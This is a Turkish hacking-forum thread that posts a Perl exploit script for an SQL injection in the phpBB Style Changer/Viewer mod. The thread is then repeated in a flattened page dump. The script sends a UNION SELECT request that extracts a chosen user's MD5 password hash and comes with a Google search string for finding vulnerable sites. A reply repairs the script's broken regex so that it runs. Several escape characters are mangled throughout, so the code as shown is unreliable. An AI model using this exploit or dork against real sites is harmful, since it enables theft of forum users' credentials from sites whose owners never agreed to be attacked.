phpBB Style ChangerViewer MOD SQL injection Exploit

respectable · 20-02-2006, 01:42

#!/usr/bin/perl
################################################## #######
# #
# Respectable #
# #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By respectable #
#wardom Team #
#http://www.wardom.org #
# #
#Turkey #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=44479
print q{
################################################## ##########
# phpBB Style ChangerViewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By respectable #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connectionn";
$serv =~ s/(http://)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failedrn";
print $socket "GET $path HTTP/1.1n";
print $socket "Host: $servn";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "[+]Connectedn";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $idn[+]Md5 Hash: $1n";
}

Söle bir perl kodum var fakat calistiramadim.
Su sekilde bi yazi aliyorum .
Unmatched before HERE mark in regex m/<<here http:at dosya adi.pl line 35.

Yardimci olanlara simdiden tsk ediyorum .

nuker · 21-02-2006, 23:25

http://www.milw0rm.com/id.php?id=1469 exploitin orjinal hali burda bence düzenleme yapmanın hiç bi getirisi olmaz.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=44479
o hatayı vermesinin sebebide 35. satırda regex yaparken $serv =~ s/(http://)//eg; seklinde bir regex fonksiyonu kullanamazsın
$serv =~ s/(http:\/\/)//eg; yapman gerekli \ karakteri herhalde kopyaladığın sitede yoktu

securityreasondan aldın sanırım=)

respectable · 21-02-2006, 23:54

Tsk ederim.

20-02-2006, 01:42	#1
respectable Çırak Kayıt Tarihi: Feb 2006 Üye numarası: #51727 Yer: We're still here and have not gone anywhere. Please excuse the mess and check back shortly. Thank yo Mesaj sayısı: 28 Karma etkisi: 0 Karma: 10	phpBB Style ChangerViewer MOD SQL injection Exploit #!/usr/bin/perl ################################################## ####### # # # Respectable # # # # # #phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT # #Created By respectable # #wardom Team # #http://www.wardom.org # # # #Turkey # ################################################## ####### #google: #"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style" ################################################## ####### use IO::Socket; if (@ARGV < 3){ Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=44479 print q{ ################################################## ########## # phpBB Style ChangerViewer MOD SQL injection Exploit # # Tested on phpBB 2.0.19 # # created By respectable # ################################################## ########## bbstyle.pl [HOST] [PATH] [Target id] bbstyle.pl www.host.com /phpbb2/ 2 ################################################## ########## }; exit; } $serv = $ARGV[0]; $dir = $ARGV[1]; $id = $ARGV[2]; print "[+]Make Connectionn"; $serv =~ s/(http://)//eg; $path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/'; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") \|\| die "[-]Connect Failedrn"; print $socket "GET $path HTTP/1.1n"; print $socket "Host: $servn"; print $socket "Accept: /n"; print $socket "Connection: closenn"; print "[+]Connectedn"; while ($hash = <$socket>){ $hash =~ m/open(.?)template/ && print "[+]User id: $idn[+]Md5 Hash: $1n"; } Söle bir perl kodum var fakat calistiramadim. Su sekilde bi yazi aliyorum . Unmatched before HERE mark in regex m/<<here http:at dosya adi.pl line 35. Yardimci olanlara simdiden tsk ediyorum .

21-02-2006, 23:25	#2
nuker Buradaydı Kayıt Tarihi: Dec 2004 Üye numarası: #669 Yer: Uzaklarda Mesaj sayısı: 501 Karma etkisi: 38 Karma: 3058	http://www.milw0rm.com/id.php?id=1469 exploitin orjinal hali burda bence düzenleme yapmanın hiç bi getirisi olmaz. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=44479 o hatayı vermesinin sebebide 35. satırda regex yaparken $serv =~ s/(http://)//eg; seklinde bir regex fonksiyonu kullanamazsın $serv =~ s/(http:\/\/)//eg; yapman gerekli \ karakteri herhalde kopyaladığın sitede yoktu securityreasondan aldın sanırım=) Düzenleyen nuker : 21-02-2006 at 23:28.

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

21-02-2006, 23:54	#3
respectable Çırak Kayıt Tarihi: Feb 2006 Üye numarası: #51727 Yer: We're still here and have not gone anywhere. Please excuse the mess and check back shortly. Thank yo Mesaj sayısı: 28 Karma etkisi: 0 Karma: 10	Tsk ederim.

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)